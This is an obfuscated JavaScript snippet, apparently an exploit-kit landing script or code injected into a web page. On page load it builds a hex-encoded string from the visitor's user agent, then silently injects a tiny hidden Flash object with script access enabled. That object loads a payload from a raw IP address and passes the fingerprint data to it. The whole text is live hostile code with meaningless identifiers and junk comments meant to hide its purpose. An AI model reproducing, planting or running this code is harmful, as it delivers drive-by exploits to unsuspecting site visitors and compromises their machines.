/*s16996d22024hssfj5649fs*/function hgfgerdfgdf(num, width){/*s61567d35248hfj62138fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s85543d90117hfj5913fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s61311d58457hfj1515fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s75732d85122hfj88254fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd78952hfs*/c += b + d;/*s77397d45837hfj73781fs*/e += 1;}return c;}/*s54944dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.87.108/?NjQ5NjQ3NDg=&pa=xXzQMvWebRXQCJ3EKvrcT6NHMVHRHECL2Y-dmrHQefjaelWkzrLFTF_yozKASwSG6_JtdfJSDV&ma=Lhj0OHKAcwm4xcAw4X9f_6h0OBzUCdg8LR_BGKaQsR9pSUErE72gj1m7AkdMgmwRCL6FETi-tL&work=MjkyNTExNDQ=", ghnvbn("http://188.225.87.108/?MTE4Mzc2MjU0&pa=xHzQMrDYbR3FFYDfKPnEUKREMU7WA0SKwY-ZhazVF5yxFDfGpbH1Fx_spVydCF-EmvJvdLMHIwKh1UTASwc&ma=wnI9bVVhApqupjEOEnReY1pXW9BfZZQsT_JDAR7A_31_9m7MddskhxxSCvGNQmOstVVsS4gsTnq_7S6CJrg&work=NTM5MDAyNDc=","wexykukusw"));